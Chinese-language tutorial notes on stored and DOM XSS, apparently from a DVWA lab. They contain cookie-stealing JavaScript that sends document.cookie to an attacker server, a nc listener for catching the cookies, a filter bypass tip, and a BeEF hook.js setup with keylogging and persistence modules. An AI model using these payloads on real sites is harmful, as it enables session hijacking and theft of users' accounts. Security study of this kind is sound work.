存储型XSS与DOM型XSS
【XSS原理】
存储型XSS
1、可长期存储于服务器端
2、每次用户访问都会被执行js脚本,攻击者只需侦听指定端口
#攻击利用方法大体等于反射型xss利用
##多出现在留言板等位置
*推荐使用burpsuite
a、观察返回结果,是否原封不动地返回输入数据?是否有其他标签
js代码通过留言板存储在服务器中,所以每次点击留言板链接,都会弹出xss弹窗
b、测试加载攻击者控制的服务器中的js文件
#启动apache2【默认侦听80端口】
a.js 【盗取客户端cookie信息,并把它上传到攻击者控制的服务器的PHP文件】
var img = new Image();
img.src = "http://192.168.56.102:88/cookies.php?cookie="+document.cookie;
***默认在客户端进行长度的限制,可用burpsuite进行绕过或直接修改HTML代码中的长度限制 【安全性好的,同时在客户端跟服务器端进行长度限制】
<script src="http://192.168.56.102/a.js"></script>
###使用nc演示效果,侦听88端口,提交成功/刷新页面,即可成功获得cookie
代码审计 【以下代码只是对输入数据进行过滤】
low
<?php if(isset($_POST['btnSign']))
{ $message = trim($_POST['mtxMessage']);
$name = trim($_POST['txtName']); // Sanitize message input
$message = stripslashes($message);
$message = mysql_real_escape_string($message); // Sanitize name input
$name = mysql_real_escape_string($name); $query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');"; $result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>' ); } ?>
medium 【Name输入框输出结果:还是原型,但js脚本已是普通文本(目前理想的过滤方法);Message中还存在】
<?php if(isset($_POST['btnSign']))
{ $message = trim($_POST['mtxMessage']);
$name = trim($_POST['txtName']); // Sanitize message input
$message = trim(strip_tags(addslashes($message)));//addslashs():增加反斜线;strip_tags():过滤HTML标签;
$message = mysql_real_escape_string($message);
$message = htmlspecialchars($message); //进行html编码,<>会被编码 // Sanitize name input
$name = str_replace('<script>', '', $name);//删除<script>,********可用拆分绕过
$name = mysql_real_escape_string($name); $query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');"; $result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>' ); } ?>
high
<?php if(isset($_POST['btnSign']))
{ $message = trim($_POST['mtxMessage']);
$name = trim($_POST['txtName']); // Sanitize message input
$message = stripslashes($message);
$message = mysql_real_escape_string($message);
$message = htmlspecialchars($message); // Sanitize name input
$name = stripslashes($name);
$name = mysql_real_escape_string($name);
$name = htmlspecialchars($name); $query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');"; $result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>' ); } ?>
一套js和其他语言都可以调用的标准的API
#本质上跟反射型中利用src的方法一样,只是调用的函数不一样而已
<script>
var img = document.createElement("img");
img.src = "http://192.168.56.102:88/cookies.php?cookie="+escape(document.cookie);
</script>
BeEF是目前欧美最流行的web框架攻击平台,它的全称是 the Browser exploitation framework project。
可用于生成、交互payload【内含大量模块,payload】
ruby编写
服务器端:管理hooked客户端
客户端:运行于客户端浏览器的JavaScript脚本
浏览器攻击面
应用普遍转移到B/S架构,浏览器成为统一客户端程序
大部分需要结合社会工程学方法对浏览器进行攻击
攻击浏览器用户
通过注入的JS脚本,利用浏览器攻击其他网站
攻击手段
利用网站xss漏洞实现攻击
诱使客户端访问含有hooked的伪造站点
结合中间人攻击注入hooked脚本
常见用途
键盘记录器
网络扫描
浏览器信息收集
绑定shell
与metasploit集成
a、默认登录账号密码beff/beff
b、<script src="http://127.0.0.1:3000/hook.js"></script>
c、模块
1、Browser 浏览器类型(可得cookie,OS等信息)
【点击对应模块即可使用,响应速度比较慢,绿色为适用;橙色也是可用,但是会被客户端使用者发现;红色可能不可用;灰色未知是否可用】
2、Exploits 漏洞利用模块
3、Network 【可用作僵尸机】
4、Persistence 当页面被关闭(主机未离线),仍可对hooked客户端进行操作【持久hooked,建议当一台主机受害后,马上进行该操作】
